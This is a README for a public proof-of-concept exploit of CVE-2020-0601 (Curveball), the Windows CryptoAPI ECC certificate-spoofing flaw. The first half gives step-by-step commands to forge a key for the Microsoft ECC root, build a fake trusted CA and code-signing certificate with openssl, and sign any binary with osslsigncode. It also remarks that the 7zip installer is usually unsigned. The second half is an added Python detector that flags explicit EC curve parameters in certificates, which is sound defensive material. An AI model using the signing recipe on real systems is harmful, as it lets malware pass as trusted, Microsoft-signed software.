ioncodes/Curveball
A PoC for CVE-2020-0601. A detailed blog post can be found here. This exploit allows you to create a fake trusted certificate by abusing how CryptoAPI handles certain parameters on ECC-based certificates.
Clone the repository and open it in Visual Studio 2019. Switch to Release and compile it. You can find prebuilt binaries here.
```
.\Curveball.exe MicrosoftECCProductRootCertificateAuthority.cer MicrosoftECCProductRootCertificateAuthority_fake.key
# in linux bash (you can also use Windows but you'd have to get an alternative for osslsigncode). WSL on Windows works fine.
openssl req -new -x509 -key MicrosoftECCProductRootCertificateAuthority_fake.key -out trusted_ca.crt
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
openssl req -new -key cert.key -out cert.csr -config openssl.conf -reqexts v3_cs
openssl x509 -req -in cert.csr -CA trusted_ca.crt -CAkey MicrosoftECCProductRootCertificateAuthority_fake.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl.conf -extensions v3_cs
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile trusted_ca.crt -name "Code Signing" -out cert.p12
./osslsigncode sign -pkcs12 cert.p12 -n "Signed by Layle" -in <BINARY_TO_SIGN> -out <SIGNED_BINARY>
```
Note that the 7zip installer is usually not signed!
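For detection: a CA certificate forged for CVE-2020-0601 carries explicit curve parameters in its EC public key instead of a named-curve OID, which legitimate public CAs do not do. The Python below is an added example, not code from this repository; the function names and the sample byte strings are constructed for illustration. It walks DER and reports how each `id-ecPublicKey` key encodes its parameters.

```python
EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")   # OID 1.2.840.10045.2.1 (id-ecPublicKey)
KINDS = {0x06: "named", 0x30: "explicit", 0x05: "implicit"}

def read_tlv(buf, pos, end):
    """Return (tag, value_start, value_end) of the DER element at pos."""
    if pos + 2 > end:
        raise ValueError("truncated DER header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                              # long-form length
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > end:
            raise ValueError("unsupported DER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > end:
        raise ValueError("DER element overruns its parent")
    return tag, pos, pos + length

def ec_param_kinds(der):
    """Classify the parameters of every id-ecPublicKey AlgorithmIdentifier in der."""
    found = []
    def walk(start, end):
        items, pos = [], start
        while pos < end:
            tag, vs, ve = read_tlv(der, pos, end)
            items.append((tag, vs, ve))
            pos = ve
        # AlgorithmIdentifier ::= SEQUENCE { algorithm OID, parameters ANY }
        if len(items) >= 2 and items[0][0] == 0x06 and der[items[0][1]:items[0][2]] == EC_PUBLIC_KEY:
            found.append(KINDS.get(items[1][0], "unknown"))
            return
        for tag, vs, ve in items:
            if tag & 0x20:                         # constructed: descend
                walk(vs, ve)
    walk(0, len(der))
    return found

def tlv(tag, body):
    """Short-form DER encoder, enough for the constructed samples below."""
    return bytes([tag, len(body)]) + body

# Constructed samples (not real keys): SubjectPublicKeyInfo with dummy key bits.
KEY_BITS = tlv(0x03, b"\x00\x04" + bytes(4))
NAMED_SPKI = tlv(0x30, tlv(0x30, tlv(0x06, EC_PUBLIC_KEY) + tlv(0x06, bytes.fromhex("2b81040022"))) + KEY_BITS)
# Explicit ECParameters stub: only the version INTEGER is present, the rest is omitted.
EXPLICIT_SPKI = tlv(0x30, tlv(0x30, tlv(0x06, EC_PUBLIC_KEY) + tlv(0x30, tlv(0x02, b"\x01"))) + KEY_BITS)

if __name__ == "__main__":
    for name, der in (("named", NAMED_SPKI), ("explicit", EXPLICIT_SPKI)):
        print(name, ec_param_kinds(der))
```

The same function accepts a whole DER-encoded certificate (for example the output of `openssl x509 -in cert.crt -outform DER`); any `"explicit"` result in a chain is worth investigating.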